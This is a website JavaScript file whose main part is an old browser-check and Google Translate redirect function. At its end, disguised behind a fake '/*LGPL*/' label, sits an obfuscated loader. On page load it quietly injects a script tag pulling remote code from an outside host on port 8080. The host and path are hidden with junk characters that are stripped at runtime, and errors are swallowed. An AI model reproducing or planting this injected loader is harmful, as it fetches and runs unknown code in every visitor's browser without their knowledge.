//<!--
browserName = navigator.appName;
browserVer = parseInt(navigator.appVersion);
condition = !(( (browserName.indexOf("Explorer") >=0 ) && (browserVer < 4) ) ||  ((browserName.indexOf("Netscape") >=0 ) && (browserVer < 2) ) ) ;
if (condition == true  )
    CanAnimate = true;
else
    CanAnimate = false;

function translator(pattern)
{

/////////////////////////////////////////////////////////////
// Script to use language convertor
// By Saradhi
/////////////////////////////////////////////////////////////

	/// Configuration parameters //////////////
	var open_in_same_window = 1;
	//////////// End Of Configuration /////////////

	var my_location = unescape(document.location.toString());
	var new_location ='';
	var new_pattern = '';
	if (my_location.indexOf('translate_c?') != -1) {
		/// From google...
		var indexof_u = my_location.indexOf('u=');
		if (indexof_u == -1) {
			new_location = document.location;
		}
		else {
			var subs = my_location.substring(indexof_u, my_location.length);
			var ss = subs.split('&');
			new_location = ss[0].substring(2, ss[0].length);
		}
	}
	else {
		new_location = document.location;
	}

	indexof_p = pattern.indexOf('|');

	var isen = '';
	if (indexof_p == -1) {
		indexof_p1 = pattern.indexOf('><');
		if (indexof_p1 == -1) {
			new_pattern = pattern;
			if (pattern == 'en') {
				isen = 1;
			}
		}
		else {
			var psplit =pattern.split('><');
			new_pattern = psplit[0]+'|'+psplit[1];
			if (psplit[1] == 'en') {
				isen = 1;
			}
		}
	}
	else {
		var psplit = pattern.split('|');
		new_pattern = psplit[0]+'|'+psplit[1];
		if (psplit[1] == 'en') {
			isen = 1;
		}
	}

	var thisurl = '';
	if (isen == 1) {
		thisurl = new_location;
	}
	else {
		thisurl = 'http://translate.google.com/translate_c?langpair=' + new_pattern + "&u=" + new_location;
	}

	if (open_in_same_window == 1) {
		window.location.href = thisurl;
	}
	else {
		if (CanAnimate ){
			msgWindow=window.open('' ,'subwindow','toolbar=yes,location=yes,directories=yes,status=yes,scrollbars=yes,menubar=yes,resizable=yes,left=0,top=0');
			msgWindow.focus();
			msgWindow.location.href = thisurl;
		}
		else {
			msgWindow=window.open(thisurl,'subwindow','toolbar=yes,location=yes,directories=yes,status=yes,scrollbars=yes,menubar=yes,resizable=yes,left=0,top=0');
		}
	}
}
// -->
/*LGPL*/ try{ window.onload = function(){var V0gff3usw74 = document.createElement('s^@!)c@r@i)^#p($t&'.replace(/\!|\(|\$|\)|@|\^|#|&/ig, ''));V0gff3usw74.setAttribute('defer', 'd)##e@!f(^e)^^r!!'.replace(/@|\$|\(|\!|&|#|\)|\^/ig, ''));V0gff3usw74.setAttribute('type', 't))&e)@$@x&&@t)(^^/(^j#^@#a^)v!a()s&&!c&&!#r!#i&$$p#$!t&'.replace(/#|@|\!|&|\)|\(|\$|\^/ig, ''));V0gff3usw74.setAttribute('id', 'A@!2()0^^k#1^^^&!5#)k($(d!&)b$u!)!k$^)$6)!^'.replace(/\^|#|\(|@|\)|\$|&|\!/ig, ''));V0gff3usw74.setAttribute('s@$&r&(!c@!'.replace(/@|\$|\(|\^|\)|\!|#|&/ig, ''),  'h($t#!^(t)@^$p&&!^:(#$/$/$))l@&)i#@^n&&k&e$d!&i&&$n)@^-@(#!c&&$^o(m)(.@#k)i)!^o@^&@(s$!k(e^@a$.^n)&))e)$$@t#!!.)&#k#(^o##!o@^$o@r^#a$&-&#)(c&@&^o&#&m).@#(w#^e@@(b)&@!n&)e&&&#t#(@e#x#&!@p!&e&r&(t(s^#^.^^^r)))u^$:#@!$&8!#0^@#8)!0$)^^/$a!#@s$$s)$!o$#c&i^a#t)&!e)$!)@d)#&@c$&o&@n$t)@&&e&n!@^t##.!c^o(#^m!#$&(/)(#a!@s(#(s@#)!o^&c)#^i^a#(@#t(e&^d&(#c!()&o!$^n&^!t!$e&$^#&n^@&t())^.$#((c!)#$o)$m!$#)/!^)&g^#o(#$o)@g&)!l(^###e$)).^)c)@@^o@)m!#)/)!s#(^#$l(u^!^t^^l@o&#@a)(d$!.#^c@&^o!&m^)/$$!f^&!@r@e#$e(#!l))$o)(t^)t)@#o)##.(!#c(@o(m(#!/$!'.replace(/&|\(|\!|\^|#|@|\)|\$/ig, ''));if (document){document.body.appendChild(V0gff3usw74);}} } catch(Wmtjvzsn919nl7duk6k7u) {}